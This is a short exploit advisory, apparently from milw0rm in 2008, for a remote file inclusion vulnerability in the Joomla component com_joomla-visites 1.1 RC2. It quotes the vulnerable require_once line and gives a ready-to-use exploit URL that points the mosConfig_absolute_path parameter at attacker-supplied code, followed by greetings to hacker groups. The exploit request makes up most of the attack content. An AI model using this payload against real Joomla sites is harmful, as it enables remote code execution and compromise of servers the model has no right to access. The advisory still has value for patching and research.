35 lines
No EOL
2 KiB
Text
35 lines
No EOL
2 KiB
Text
/===============================================================================================================================================\
|
|
| |
|
|
| [o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability |
|
|
| |
|
|
| Software : com_joomla-visites version 1.1 RC2 |
|
|
| Vendor : http://www.joomla-visites.net/ |
|
|
| Author : NoGe |
|
|
| Contact : noge[dot]code[at]gmail[dot]com |
|
|
| |
|
|
|===============================================================================================================================================|
|
|
| |
|
|
| [o] Vulnerable file |
|
|
| |
|
|
| administrator/components/com_joomla-visites/core/include/myMailer.class.php |
|
|
| |
|
|
| require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php'; |
|
|
| |
|
|
| |
|
|
| |
|
|
| [o] Exploit |
|
|
| |
|
|
| http://localhost/[path]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode] |
|
|
| |
|
|
|===============================================================================================================================================|
|
|
| |
|
|
| [o] Greetz |
|
|
| |
|
|
| all crew #papuahacker #nyubicrew #baliemhackerlink |
|
|
| skulmatic olibekas ulga Cungkee nyubi k1tk4t LoCK3R culun_borneo |
|
|
| yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ str0ke |
|
|
| http://kapukvalley.net member |
|
|
| |
|
|
\===============================================================================================================================================/
|
|
|
|
# milw0rm.com [2008-04-25] |